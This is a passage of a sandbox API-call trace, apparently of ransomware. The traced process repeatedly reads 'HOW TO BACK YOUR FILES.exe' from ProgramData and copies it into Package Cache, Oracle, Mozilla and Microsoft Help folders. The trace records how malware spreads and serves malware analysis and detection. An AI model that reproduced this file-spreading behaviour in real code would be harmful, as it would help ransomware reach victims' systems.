Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64" [0090.511] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64" [0090.511] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.511] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.512] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.512] GetLastError () returned 0x0 [0090.512] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.512] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.512] CloseHandle (hObject=0x120) returned 1 [0090.512] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.512] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x6302cbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6302cbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.512] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.512] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.513] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460" [0090.513] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460" [0090.513] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.513] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.513] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.513] GetLastError () returned 0x0 [0090.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.514] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.514] CloseHandle (hObject=0x120) returned 1 [0090.514] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.514] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.514] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.514] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.514] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages" [0090.514] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages" [0090.514] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.514] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.515] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.515] GetLastError () returned 0x0 [0090.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.515] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.515] CloseHandle (hObject=0x120) returned 1 [0090.515] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.515] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.516] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.516] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.516] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch" [0090.516] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch" [0090.516] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.516] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.516] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.517] GetLastError () returned 0x0 [0090.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.517] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.517] CloseHandle (hObject=0x120) returned 1 [0090.517] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.517] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.517] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.517] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.517] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64" [0090.517] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64" [0090.517] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.517] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.518] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.518] GetLastError () returned 0x0 [0090.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.518] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.518] CloseHandle (hObject=0x120) returned 1 [0090.518] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.518] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x63183820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63183820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.519] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.519] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.519] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Oracle", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Oracle") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Oracle" [0090.519] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Oracle" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Oracle") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Oracle" [0090.519] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.519] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Oracle\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\oracle\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.520] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.520] GetLastError () returned 0x0 [0090.520] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.520] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.520] CloseHandle (hObject=0x120) returned 1 [0090.520] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.520] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Oracle\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.520] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.520] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.520] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla" [0090.520] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla" [0090.521] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.521] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\mozilla\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.529] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.529] GetLastError () returned 0x0 [0090.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.529] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.529] CloseHandle (hObject=0x120) returned 1 [0090.530] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.530] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.530] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.530] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.530] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla\\logs", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla\\logs") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla\\logs" [0090.530] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla\\logs" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla\\logs") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla\\logs" [0090.530] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.530] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla\\logs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\mozilla\\logs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.531] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.531] GetLastError () returned 0x0 [0090.531] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.531] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.531] CloseHandle (hObject=0x120) returned 1 [0090.531] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.531] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Mozilla\\logs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6328e1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6328e1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.531] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.531] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.532] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft Help", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft Help") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft Help" [0090.532] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft Help" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft Help") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft Help" [0090.532] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.532] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft Help\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft help\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.532] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.532] GetLastError () returned 0x0 [0090.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.533] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.533] CloseHandle (hObject=0x120) returned 1 [0090.533] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.533] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft Help\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x635adea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x635adea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.533] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.533] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.534] lstrcpynW (in: 